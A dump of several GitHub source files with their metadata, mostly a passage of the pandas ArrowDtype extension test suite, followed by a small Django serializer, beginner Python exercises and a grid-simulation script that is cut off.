super().test_groupby_extension_agg(as_index, data_for_grouping)\n\n\nclass TestBaseDtype(base.BaseDtypeTests):\n def test_construct_from_string_own_name(self, dtype, request):\n pa_dtype = dtype.pyarrow_dtype\n if pa.types.is_timestamp(pa_dtype) and pa_dtype.tz is not None:\n request.node.add_marker(\n pytest.mark.xfail(\n raises=NotImplementedError,\n reason=f\"pyarrow.type_for_alias cannot infer {pa_dtype}\",\n )\n )\n elif pa.types.is_string(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=TypeError,\n reason=(\n \"Still support StringDtype('pyarrow') \"\n \"over ArrowDtype(pa.string())\"\n ),\n )\n )\n super().test_construct_from_string_own_name(dtype)\n\n def test_is_dtype_from_name(self, dtype, request):\n pa_dtype = dtype.pyarrow_dtype\n if pa.types.is_timestamp(pa_dtype) and pa_dtype.tz is not None:\n request.node.add_marker(\n pytest.mark.xfail(\n raises=NotImplementedError,\n reason=f\"pyarrow.type_for_alias cannot infer {pa_dtype}\",\n )\n )\n elif pa.types.is_string(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=(\n \"Still support 
StringDtype('pyarrow') \"\n \"over ArrowDtype(pa.string())\"\n ),\n )\n )\n super().test_is_dtype_from_name(dtype)\n\n def test_construct_from_string(self, dtype, request):\n pa_dtype = dtype.pyarrow_dtype\n if pa.types.is_timestamp(pa_dtype) and pa_dtype.tz is not None:\n request.node.add_marker(\n pytest.mark.xfail(\n raises=NotImplementedError,\n reason=f\"pyarrow.type_for_alias cannot infer {pa_dtype}\",\n )\n )\n elif pa.types.is_string(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=TypeError,\n reason=(\n \"Still support StringDtype('pyarrow') \"\n \"over ArrowDtype(pa.string())\"\n ),\n )\n )\n super().test_construct_from_string(dtype)\n\n def test_construct_from_string_another_type_raises(self, dtype):\n msg = r\"'another_type' must end with '\\[pyarrow\\]'\"\n with pytest.raises(TypeError, match=msg):\n type(dtype).construct_from_string(\"another_type\")\n\n def test_get_common_dtype(self, dtype, request):\n pa_dtype = dtype.pyarrow_dtype\n if (\n pa.types.is_date(pa_dtype)\n or pa.types.is_time(pa_dtype)\n or (\n pa.types.is_timestamp(pa_dtype)\n and (pa_dtype.unit != \"ns\" or pa_dtype.tz is not None)\n )\n or (pa.types.is_duration(pa_dtype) and pa_dtype.unit != \"ns\")\n or pa.types.is_string(pa_dtype)\n or pa.types.is_binary(pa_dtype)\n ):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=(\n f\"{pa_dtype} does not have associated numpy \"\n f\"dtype findable by find_common_type\"\n )\n )\n )\n super().test_get_common_dtype(dtype)\n\n\nclass TestBaseIndex(base.BaseIndexTests):\n pass\n\n\nclass TestBaseInterface(base.BaseInterfaceTests):\n @pytest.mark.xfail(reason=\"pyarrow.ChunkedArray does not support views.\")\n def test_view(self, data):\n super().test_view(data)\n\n\nclass TestBaseMissing(base.BaseMissingTests):\n @pytest.mark.filterwarnings(\"ignore:Falling back:pandas.errors.PerformanceWarning\")\n def test_dropna_array(self, data_missing):\n super().test_dropna_array(data_missing)\n\n def test_fillna_no_op_returns_copy(self, data):\n with tm.maybe_produces_warning(\n PerformanceWarning, pa_version_under7p0, check_stacklevel=False\n ):\n super().test_fillna_no_op_returns_copy(data)\n\n def test_fillna_series_method(self, data_missing, fillna_method):\n with tm.maybe_produces_warning(\n PerformanceWarning, pa_version_under7p0, check_stacklevel=False\n ):\n super().test_fillna_series_method(data_missing, fillna_method)\n\n\nclass TestBasePrinting(base.BasePrintingTests):\n pass\n\n\nclass TestBaseReshaping(base.BaseReshapingTests):\n @pytest.mark.xfail(reason=\"GH 45419: pyarrow.ChunkedArray does not support views\")\n def test_transpose(self, data):\n super().test_transpose(data)\n\n\nclass TestBaseSetitem(base.BaseSetitemTests):\n @pytest.mark.xfail(reason=\"GH 45419: pyarrow.ChunkedArray does not support views\")\n def test_setitem_preserves_views(self, data):\n super().test_setitem_preserves_views(data)\n\n\nclass TestBaseParsing(base.BaseParsingTests):\n @pytest.mark.parametrize(\"engine\", [\"c\", \"python\"])\n def test_EA_types(self, engine, data, request):\n pa_dtype = data.dtype.pyarrow_dtype\n if pa.types.is_boolean(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(raises=TypeError, reason=\"GH 47534\")\n )\n elif pa.types.is_timestamp(pa_dtype) and pa_dtype.tz is not None:\n request.node.add_marker(\n pytest.mark.xfail(\n raises=NotImplementedError,\n reason=f\"Parameterized types with tz={pa_dtype.tz} not supported.\",\n )\n )\n elif pa.types.is_binary(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(reason=\"CSV 
parsers don't correctly handle binary\")\n )\n df = pd.DataFrame({\"with_dtype\": pd.Series(data, dtype=str(data.dtype))})\n csv_output = df.to_csv(index=False, na_rep=np.nan)\n if pa.types.is_binary(pa_dtype):\n csv_output = BytesIO(csv_output)\n else:\n csv_output = StringIO(csv_output)\n result = pd.read_csv(\n csv_output, dtype={\"with_dtype\": str(data.dtype)}, engine=engine\n )\n expected = df\n self.assert_frame_equal(result, expected)\n\n\nclass TestBaseUnaryOps(base.BaseUnaryOpsTests):\n def test_invert(self, data, request):\n pa_dtype = data.dtype.pyarrow_dtype\n if not pa.types.is_boolean(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"pyarrow.compute.invert does not support {pa_dtype}\",\n )\n )\n super().test_invert(data)\n\n\nclass TestBaseMethods(base.BaseMethodsTests):\n def test_argsort_missing_array(self, data_missing_for_sorting):\n with tm.maybe_produces_warning(\n PerformanceWarning, pa_version_under7p0, check_stacklevel=False\n ):\n super().test_argsort_missing_array(data_missing_for_sorting)\n\n @pytest.mark.parametrize(\"periods\", [1, -2])\n def test_diff(self, data, periods, request):\n pa_dtype = data.dtype.pyarrow_dtype\n if pa.types.is_unsigned_integer(pa_dtype) and periods == 1:\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowInvalid,\n reason=(\n f\"diff with {pa_dtype} and periods={periods} will overflow\"\n ),\n )\n )\n super().test_diff(data, periods)\n\n @pytest.mark.filterwarnings(\"ignore:Falling back:pandas.errors.PerformanceWarning\")\n @pytest.mark.parametrize(\"dropna\", [True, False])\n def test_value_counts(self, all_data, dropna, request):\n pa_dtype = all_data.dtype.pyarrow_dtype\n if pa.types.is_duration(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"value_count has no kernel for {pa_dtype}\",\n )\n )\n super().test_value_counts(all_data, dropna)\n\n def test_value_counts_with_normalize(self, data, request):\n pa_dtype = data.dtype.pyarrow_dtype\n if pa.types.is_duration(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"value_count has no pyarrow kernel for {pa_dtype}\",\n )\n )\n with tm.maybe_produces_warning(\n PerformanceWarning, pa_version_under7p0, check_stacklevel=False\n ):\n super().test_value_counts_with_normalize(data)\n\n @pytest.mark.xfail(\n pa_version_under6p0,\n raises=NotImplementedError,\n reason=\"argmin/max only implemented for pyarrow version >= 6.0\",\n )\n def test_argmin_argmax(\n self, data_for_sorting, data_missing_for_sorting, na_value, request\n ):\n pa_dtype = data_for_sorting.dtype.pyarrow_dtype\n if pa.types.is_boolean(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=f\"{pa_dtype} only has 2 unique possible values\",\n )\n )\n elif pa.types.is_duration(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"min_max not supported in pyarrow for {pa_dtype}\",\n )\n )\n super().test_argmin_argmax(data_for_sorting, data_missing_for_sorting, na_value)\n\n @pytest.mark.parametrize(\n \"op_name, skipna, expected\",\n [\n (\"idxmax\", True, 0),\n (\"idxmin\", True, 2),\n (\"argmax\", True, 0),\n (\"argmin\", True, 2),\n (\"idxmax\", False, np.nan),\n (\"idxmin\", False, np.nan),\n (\"argmax\", False, -1),\n (\"argmin\", False, -1),\n ],\n )\n def test_argreduce_series(\n self, data_missing_for_sorting, op_name, skipna, expected, request\n ):\n pa_dtype = 
data_missing_for_sorting.dtype.pyarrow_dtype\n if pa_version_under6p0 and skipna:\n request.node.add_marker(\n pytest.mark.xfail(\n raises=NotImplementedError,\n reason=\"min_max not supported in pyarrow\",\n )\n )\n elif not pa_version_under6p0 and pa.types.is_duration(pa_dtype) and skipna:\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"min_max not supported in pyarrow for {pa_dtype}\",\n )\n )\n super().test_argreduce_series(\n data_missing_for_sorting, op_name, skipna, expected\n )\n\n @pytest.mark.parametrize(\n \"na_position, expected\",\n [\n (\"last\", np.array([2, 0, 1], dtype=np.dtype(\"intp\"))),\n (\"first\", np.array([1, 2, 0], dtype=np.dtype(\"intp\"))),\n ],\n )\n def test_nargsort(self, data_missing_for_sorting, na_position, expected):\n with tm.maybe_produces_warning(\n PerformanceWarning, pa_version_under7p0, check_stacklevel=False\n ):\n super().test_nargsort(data_missing_for_sorting, na_position, expected)\n\n @pytest.mark.parametrize(\"ascending\", [True, False])\n def test_sort_values(self, data_for_sorting, ascending, sort_by_key, request):\n pa_dtype = data_for_sorting.dtype.pyarrow_dtype\n if pa.types.is_duration(pa_dtype) and not ascending:\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=(\n f\"unique has no pyarrow kernel \"\n f\"for {pa_dtype} when ascending={ascending}\"\n ),\n )\n )\n with tm.maybe_produces_warning(\n PerformanceWarning, pa_version_under7p0, check_stacklevel=False\n ):\n super().test_sort_values(data_for_sorting, ascending, sort_by_key)\n\n @pytest.mark.parametrize(\"ascending\", [True, False])\n def test_sort_values_missing(\n self, data_missing_for_sorting, ascending, sort_by_key\n ):\n with tm.maybe_produces_warning(\n PerformanceWarning, pa_version_under7p0, check_stacklevel=False\n ):\n super().test_sort_values_missing(\n data_missing_for_sorting, ascending, sort_by_key\n )\n\n @pytest.mark.parametrize(\"ascending\", [True, False])\n def test_sort_values_frame(self, data_for_sorting, ascending, request):\n pa_dtype = data_for_sorting.dtype.pyarrow_dtype\n if pa.types.is_duration(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=(\n f\"dictionary_encode has no pyarrow kernel \"\n f\"for {pa_dtype} when ascending={ascending}\"\n ),\n )\n )\n with tm.maybe_produces_warning(\n PerformanceWarning, pa_version_under7p0, check_stacklevel=False\n ):\n super().test_sort_values_frame(data_for_sorting, ascending)\n\n @pytest.mark.parametrize(\"box\", [pd.Series, lambda x: x])\n @pytest.mark.parametrize(\"method\", [lambda x: x.unique(), pd.unique])\n def test_unique(self, data, box, method, request):\n pa_dtype = data.dtype.pyarrow_dtype\n if pa.types.is_duration(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"unique has no pyarrow kernel for {pa_dtype}.\",\n )\n )\n super().test_unique(data, box, method)\n\n def test_factorize(self, data_for_grouping, request):\n pa_dtype = data_for_grouping.dtype.pyarrow_dtype\n if pa.types.is_duration(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"dictionary_encode has no pyarrow kernel for {pa_dtype}\",\n )\n )\n elif pa.types.is_boolean(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=f\"{pa_dtype} only has 2 unique possible values\",\n )\n )\n super().test_factorize(data_for_grouping)\n\n def 
test_factorize_equivalence(self, data_for_grouping, request):\n pa_dtype = data_for_grouping.dtype.pyarrow_dtype\n if pa.types.is_duration(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"dictionary_encode has no pyarrow kernel for {pa_dtype}\",\n )\n )\n super().test_factorize_equivalence(data_for_grouping)\n\n def test_factorize_empty(self, data, request):\n pa_dtype = data.dtype.pyarrow_dtype\n if pa.types.is_duration(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"dictionary_encode has no pyarrow kernel for {pa_dtype}\",\n )\n )\n super().test_factorize_empty(data)\n\n @pytest.mark.xfail(\n reason=\"result dtype pyarrow[bool] better than expected dtype object\"\n )\n def test_combine_le(self, data_repeated):\n super().test_combine_le(data_repeated)\n\n def test_combine_add(self, data_repeated, request):\n pa_dtype = next(data_repeated(1)).dtype.pyarrow_dtype\n if pa.types.is_temporal(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=TypeError,\n reason=f\"{pa_dtype} cannot be added to {pa_dtype}\",\n )\n )\n super().test_combine_add(data_repeated)\n\n def test_searchsorted(self, data_for_sorting, as_series, request):\n pa_dtype = data_for_sorting.dtype.pyarrow_dtype\n if pa.types.is_boolean(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=f\"{pa_dtype} only has 2 unique possible values\",\n )\n )\n super().test_searchsorted(data_for_sorting, as_series)\n\n def test_basic_equals(self, data):\n # https://github.com/pandas-dev/pandas/issues/34660\n assert pd.Series(data).equals(pd.Series(data))\n\n\nclass TestBaseArithmeticOps(base.BaseArithmeticOpsTests):\n\n divmod_exc = NotImplementedError\n\n def _patch_combine(self, obj, other, op):\n # BaseOpsUtil._combine can upcast expected dtype\n # (because it generates expected on python scalars)\n # while ArrowExtensionArray maintains original type\n expected = base.BaseArithmeticOpsTests._combine(self, obj, other, op)\n was_frame = False\n if isinstance(expected, pd.DataFrame):\n was_frame = True\n expected_data = expected.iloc[:, 0]\n original_dtype = obj.iloc[:, 0].dtype\n else:\n expected_data = expected\n original_dtype = obj.dtype\n pa_array = pa.array(expected_data._values).cast(original_dtype.pyarrow_dtype)\n pd_array = type(expected_data._values)(pa_array)\n if was_frame:\n expected = pd.DataFrame(\n pd_array, index=expected.index, columns=expected.columns\n )\n else:\n expected = pd.Series(pd_array)\n return expected\n\n def test_arith_series_with_scalar(\n self, data, all_arithmetic_operators, request, monkeypatch\n ):\n pa_dtype = data.dtype.pyarrow_dtype\n\n arrow_temporal_supported = not pa_version_under8p0 and (\n all_arithmetic_operators in (\"__add__\", \"__radd__\")\n and pa.types.is_duration(pa_dtype)\n or all_arithmetic_operators in (\"__sub__\", \"__rsub__\")\n and pa.types.is_temporal(pa_dtype)\n )\n if all_arithmetic_operators == \"__rmod__\" and (\n pa.types.is_string(pa_dtype) or pa.types.is_binary(pa_dtype)\n ):\n pytest.skip(\"Skip testing Python string formatting\")\n elif all_arithmetic_operators in {\n \"__mod__\",\n \"__rmod__\",\n }:\n self.series_scalar_exc = NotImplementedError\n elif arrow_temporal_supported:\n self.series_scalar_exc = None\n elif not (\n pa.types.is_floating(pa_dtype)\n or pa.types.is_integer(pa_dtype)\n or arrow_temporal_supported\n ):\n self.series_scalar_exc = pa.ArrowNotImplementedError\n else:\n self.series_scalar_exc = None\n if 
(\n all_arithmetic_operators == \"__rpow__\"\n and (pa.types.is_floating(pa_dtype) or pa.types.is_integer(pa_dtype))\n and not pa_version_under6p0\n ):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=(\n f\"GH 29997: 1**pandas.NA == 1 while 1**pyarrow.NA == NULL \"\n f\"for {pa_dtype}\"\n )\n )\n )\n elif arrow_temporal_supported:\n request.node.add_marker(\n pytest.mark.xfail(\n raises=TypeError,\n reason=(\n f\"{all_arithmetic_operators} not supported between\"\n f\"pd.NA and {pa_dtype} Python scalar\"\n ),\n )\n )\n elif (\n all_arithmetic_operators in {\"__rtruediv__\", \"__rfloordiv__\"}\n and (pa.types.is_floating(pa_dtype) or pa.types.is_integer(pa_dtype))\n and not pa_version_under6p0\n ):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowInvalid,\n reason=\"divide by 0\",\n )\n )\n if all_arithmetic_operators == \"__floordiv__\" and pa.types.is_integer(pa_dtype):\n # BaseOpsUtil._combine always returns int64, while ArrowExtensionArray does\n # not upcast\n monkeypatch.setattr(TestBaseArithmeticOps, \"_combine\", self._patch_combine)\n super().test_arith_series_with_scalar(data, all_arithmetic_operators)\n\n def test_arith_frame_with_scalar(\n self, data, all_arithmetic_operators, request, monkeypatch\n ):\n pa_dtype = data.dtype.pyarrow_dtype\n\n arrow_temporal_supported = not pa_version_under8p0 and (\n all_arithmetic_operators in (\"__add__\", \"__radd__\")\n and pa.types.is_duration(pa_dtype)\n or all_arithmetic_operators in (\"__sub__\", \"__rsub__\")\n and pa.types.is_temporal(pa_dtype)\n )\n if all_arithmetic_operators == \"__rmod__\" and (\n pa.types.is_string(pa_dtype) or pa.types.is_binary(pa_dtype)\n ):\n pytest.skip(\"Skip testing Python string formatting\")\n elif all_arithmetic_operators in {\n \"__mod__\",\n \"__rmod__\",\n }:\n self.frame_scalar_exc = NotImplementedError\n elif arrow_temporal_supported:\n self.frame_scalar_exc = None\n elif not (pa.types.is_floating(pa_dtype) or pa.types.is_integer(pa_dtype)):\n self.frame_scalar_exc = pa.ArrowNotImplementedError\n else:\n self.frame_scalar_exc = None\n if (\n all_arithmetic_operators == \"__rpow__\"\n and (pa.types.is_floating(pa_dtype) or pa.types.is_integer(pa_dtype))\n and not pa_version_under6p0\n ):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=(\n f\"GH 29997: 1**pandas.NA == 1 while 1**pyarrow.NA == NULL \"\n f\"for {pa_dtype}\"\n )\n )\n )\n elif arrow_temporal_supported:\n request.node.add_marker(\n pytest.mark.xfail(\n raises=TypeError,\n reason=(\n f\"{all_arithmetic_operators} not supported between\"\n f\"pd.NA and {pa_dtype} Python scalar\"\n ),\n )\n )\n elif (\n all_arithmetic_operators in {\"__rtruediv__\", \"__rfloordiv__\"}\n and (pa.types.is_floating(pa_dtype) or pa.types.is_integer(pa_dtype))\n and not pa_version_under6p0\n ):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowInvalid,\n reason=\"divide by 0\",\n )\n )\n if all_arithmetic_operators == \"__floordiv__\" and pa.types.is_integer(pa_dtype):\n # BaseOpsUtil._combine always returns int64, while ArrowExtensionArray does\n # not upcast\n monkeypatch.setattr(TestBaseArithmeticOps, \"_combine\", self._patch_combine)\n super().test_arith_frame_with_scalar(data, all_arithmetic_operators)\n\n def test_arith_series_with_array(\n self, data, all_arithmetic_operators, request, monkeypatch\n ):\n pa_dtype = data.dtype.pyarrow_dtype\n\n arrow_temporal_supported = not pa_version_under8p0 and (\n all_arithmetic_operators in (\"__add__\", \"__radd__\")\n and pa.types.is_duration(pa_dtype)\n or 
all_arithmetic_operators in (\"__sub__\", \"__rsub__\")\n and pa.types.is_temporal(pa_dtype)\n )\n if all_arithmetic_operators in {\n \"__mod__\",\n \"__rmod__\",\n }:\n self.series_array_exc = NotImplementedError\n elif arrow_temporal_supported:\n self.series_array_exc = None\n elif not (pa.types.is_floating(pa_dtype) or pa.types.is_integer(pa_dtype)):\n self.series_array_exc = pa.ArrowNotImplementedError\n else:\n self.series_array_exc = None\n if (\n all_arithmetic_operators == \"__rpow__\"\n and (pa.types.is_floating(pa_dtype) or pa.types.is_integer(pa_dtype))\n and not pa_version_under6p0\n ):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=(\n f\"GH 29997: 1**pandas.NA == 1 while 1**pyarrow.NA == NULL \"\n f\"for {pa_dtype}\"\n )\n )\n )\n elif (\n all_arithmetic_operators\n in (\n \"__sub__\",\n \"__rsub__\",\n )\n and pa.types.is_unsigned_integer(pa_dtype)\n and not pa_version_under6p0\n ):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowInvalid,\n reason=(\n f\"Implemented pyarrow.compute.subtract_checked \"\n f\"which raises on overflow for {pa_dtype}\"\n ),\n )\n )\n elif arrow_temporal_supported:\n request.node.add_marker(\n pytest.mark.xfail(\n raises=TypeError,\n reason=(\n f\"{all_arithmetic_operators} not supported between\"\n f\"pd.NA and {pa_dtype} Python scalar\"\n ),\n )\n )\n elif (\n all_arithmetic_operators in {\"__rtruediv__\", \"__rfloordiv__\"}\n and (pa.types.is_floating(pa_dtype) or pa.types.is_integer(pa_dtype))\n and not pa_version_under6p0\n ):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowInvalid,\n reason=\"divide by 0\",\n )\n )\n op_name = all_arithmetic_operators\n ser = pd.Series(data)\n # pd.Series([ser.iloc[0]] * len(ser)) may not return ArrowExtensionArray\n # since ser.iloc[0] is a python scalar\n other = pd.Series(pd.array([ser.iloc[0]] * len(ser), dtype=data.dtype))\n if pa.types.is_floating(pa_dtype) or (\n pa.types.is_integer(pa_dtype) and all_arithmetic_operators != \"__truediv__\"\n ):\n monkeypatch.setattr(TestBaseArithmeticOps, \"_combine\", self._patch_combine)\n self.check_opname(ser, op_name, other, exc=self.series_array_exc)\n\n def test_add_series_with_extension_array(self, data, request):\n pa_dtype = data.dtype.pyarrow_dtype\n if not (\n pa.types.is_integer(pa_dtype)\n or pa.types.is_floating(pa_dtype)\n or (not pa_version_under8p0 and pa.types.is_duration(pa_dtype))\n ):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=NotImplementedError,\n reason=f\"add_checked not implemented for {pa_dtype}\",\n )\n )\n elif pa_dtype.equals(\"int8\"):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowInvalid,\n reason=f\"raises on overflow for {pa_dtype}\",\n )\n )\n super().test_add_series_with_extension_array(data)\n\n\nclass TestBaseComparisonOps(base.BaseComparisonOpsTests):\n def assert_series_equal(self, left, right, *args, **kwargs):\n # Series.combine for \"expected\" retains bool[pyarrow] dtype\n # While \"result\" return \"boolean\" dtype\n right = pd.Series(right._values.to_numpy(), dtype=\"boolean\")\n super().assert_series_equal(left, right, *args, **kwargs)\n\n def test_compare_array(self, data, comparison_op, na_value, request):\n pa_dtype = data.dtype.pyarrow_dtype\n ser = pd.Series(data)\n # pd.Series([ser.iloc[0]] * len(ser)) may not return ArrowExtensionArray\n # since ser.iloc[0] is a python scalar\n other = pd.Series(pd.array([ser.iloc[0]] * len(ser), dtype=data.dtype))\n if comparison_op.__name__ in [\"eq\", \"ne\"]:\n # comparison should match point-wise 
comparisons\n result = comparison_op(ser, other)\n # Series.combine does not calculate the NA mask correctly\n # when comparing over an array\n assert result[8] is na_value\n assert result[97] is na_value\n expected = ser.combine(other, comparison_op)\n expected[8] = na_value\n expected[97] = na_value\n self.assert_series_equal(result, expected)\n\n else:\n exc = None\n try:\n result = comparison_op(ser, other)\n except Exception as err:\n exc = err\n\n if exc is None:\n # Didn't error, then should match point-wise behavior\n if pa.types.is_temporal(pa_dtype):\n # point-wise comparison with pd.NA raises TypeError\n assert result[8] is na_value\n assert result[97] is na_value\n result = result.drop([8, 97]).reset_index(drop=True)\n ser = ser.drop([8, 97])\n other = other.drop([8, 97])\n expected = ser.combine(other, comparison_op)\n self.assert_series_equal(result, expected)\n else:\n with pytest.raises(type(exc)):\n ser.combine(other, comparison_op)\n\n def test_invalid_other_comp(self, data, comparison_op):\n # GH 48833\n with pytest.raises(\n NotImplementedError, match=\".* not implemented for <class 'object'>\"\n ):\n comparison_op(data, object())\n\n\ndef test_arrowdtype_construct_from_string_type_with_unsupported_parameters():\n with pytest.raises(NotImplementedError, match=\"Passing pyarrow type\"):\n ArrowDtype.construct_from_string(\"timestamp[s, tz=UTC][pyarrow]\")\n\n\n@pytest.mark.parametrize(\n \"interpolation\", [\"linear\", \"lower\", \"higher\", \"nearest\", \"midpoint\"]\n)\n@pytest.mark.parametrize(\"quantile\", [0.5, [0.5, 0.5]])\ndef test_quantile(data, interpolation, quantile, request):\n pa_dtype = data.dtype.pyarrow_dtype\n if not (pa.types.is_integer(pa_dtype) or pa.types.is_floating(pa_dtype)):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"quantile not supported by pyarrow for {pa_dtype}\",\n )\n )\n data = data.take([0, 0, 0])\n ser = pd.Series(data)\n result = ser.quantile(q=quantile, interpolation=interpolation)\n if quantile == 0.5:\n assert result == data[0]\n else:\n # Just check the values\n result = result.astype(\"float64[pyarrow]\")\n expected = pd.Series(\n data.take([0, 0]).astype(\"float64[pyarrow]\"), index=[0.5, 0.5]\n )\n tm.assert_series_equal(result, expected)\n\n\n@pytest.mark.xfail(\n pa_version_under6p0,\n raises=NotImplementedError,\n reason=\"mode only supported for pyarrow version >= 6.0\",\n)\n@pytest.mark.parametrize(\"dropna\", [True, False])\n@pytest.mark.parametrize(\n \"take_idx, exp_idx\",\n [[[0, 0, 2, 2, 4, 4], [4, 0]], [[0, 0, 0, 2, 4, 4], [0]]],\n ids=[\"multi_mode\", \"single_mode\"],\n)\ndef test_mode(data_for_grouping, dropna, take_idx, exp_idx, request):\n pa_dtype = data_for_grouping.dtype.pyarrow_dtype\n if (\n pa.types.is_temporal(pa_dtype)\n or pa.types.is_string(pa_dtype)\n or pa.types.is_binary(pa_dtype)\n ):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"mode not supported by pyarrow for {pa_dtype}\",\n )\n )\n elif (\n pa.types.is_boolean(pa_dtype)\n and \"multi_mode\" in request.node.nodeid\n and pa_version_under9p0\n ):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=\"https://issues.apache.org/jira/browse/ARROW-17096\",\n )\n )\n data = data_for_grouping.take(take_idx)\n ser = pd.Series(data)\n result = ser.mode(dropna=dropna)\n expected = pd.Series(data_for_grouping.take(exp_idx))\n tm.assert_series_equal(result, expected)\n\n\ndef test_is_bool_dtype():\n # GH 22667\n data = ArrowExtensionArray(pa.array([True, False, 
True]))\n assert is_bool_dtype(data)\n assert pd.core.common.is_bool_indexer(data)\n s = pd.Series(range(len(data)))\n result = s[data]\n expected = s[np.asarray(data)]\n tm.assert_series_equal(result, expected)\n\n\ndef test_pickle_roundtrip(data):\n # GH 42600\n expected = pd.Series(data)\n expected_sliced = expected.head(2)\n full_pickled = pickle.dumps(expected)\n sliced_pickled = pickle.dumps(expected_sliced)\n\n assert len(full_pickled) > len(sliced_pickled)\n\n result = pickle.loads(full_pickled)\n tm.assert_series_equal(result, expected)\n\n result_sliced = pickle.loads(sliced_pickled)\n tm.assert_series_equal(result_sliced, expected_sliced)\n\n\ndef test_astype_from_non_pyarrow(data):\n # GH49795\n pd_array = data._data.to_pandas().array\n result = pd_array.astype(data.dtype)\n assert not isinstance(pd_array.dtype, ArrowDtype)\n assert isinstance(result.dtype, ArrowDtype)\n tm.assert_extension_array_equal(result, data)\n","repo_name":"OpenSource-A-414/opensource-A--414","sub_path":"pandas-main/pandas/tests/extension/test_arrow.py","file_name":"test_arrow.py","file_ext":"py","file_size_in_byte":52395,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"484523780","text":"\"\"\"Serializers collection for TOS application\"\"\"\nfrom rest_framework import serializers\nfrom apps.tos.models import SignedTOS\n\nclass TOSSerializer(serializers.ModelSerializer):\n \"\"\"\n Serializer for TOS model.\n \"\"\"\n text = serializers.SerializerMethodField()\n\n class Meta:\n fields = [\n \"uuid\",\n \"first_name\",\n \"last_name\",\n \"street\",\n \"post_code\",\n \"text\",\n \"created_at\",\n ]\n model = SignedTOS\n\n # SerializerMethodField looks up get_<field_name> by default; naming the\n # method plain `text` would clobber the declared field.\n def get_text(self, obj):\n return obj.text\n","repo_name":"vchernetsov/rnc_test","sub_path":"source/apps/tos/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73209723306","text":"a = int(input())\nb = int(input())\nc = int(input())\n\nans = 0\nif a == 1:\n ans = a + b\n if c == 1:\n ans += c\n else:\n ans *= c\nelif b == 1:\n ans = (b + min(a,c)) * max(a, c)\nelif c == 1:\n ans = (b + c) * a\nelse:\n ans = a * b * c\n\nprint(ans)","repo_name":"leonel1301/Python-Exercises","sub_path":"CodeForces/479A.py","file_name":"479A.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"27105672903","text":"# 2. 
Write a function that takes a list of strings as an argument and returns a new list of strings that are all reversed.\ndef reverse_list (list_of_string, sp = ''):\n new_list = []\n for i in list_of_string:\n elem = list(i)\n elem.reverse()\n elem_for_new_list = []\n for k in elem:\n elem_for_new_list.append(k)\n new_list.append(sp.join(elem_for_new_list))\n return new_list\nprint(reverse_list(['Windows', 'macOS', 'Linux']))\n","repo_name":"MikitaTsiarentsyeu/Md-PT1-61-23","sub_path":"Tasks/Alinovskaya/Task5/Task5_2.py","file_name":"Task5_2.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42089268802","text":"from copy import deepcopy\n\ndef grow():\n new_graph = [[0] * n for _ in range(n)]\n\n for x in range(n):\n for y in range(n):\n if graph[x][y] >= 1:\n\n for k in range(4):\n nx = x + dx[k]\n ny = y + dy[k]\n\n if 0 <= nx < n and 0 <= ny < n:\n if graph[nx][ny] >= 1:\n new_graph[nx][ny] += 1\n\n for x in range(n):\n for y in range(n):\n graph[x][y] += new_graph[x][y]\n\ndef spread():\n new_graph = deepcopy(graph)\n\n for x in range(n):\n for y in range(n):\n if graph[x][y] >= 1:\n\n tree_amount = graph[x][y]\n cnt = 0\n for k in range(4):\n nx = x + dx[k]\n ny = y + dy[k]\n\n if 0 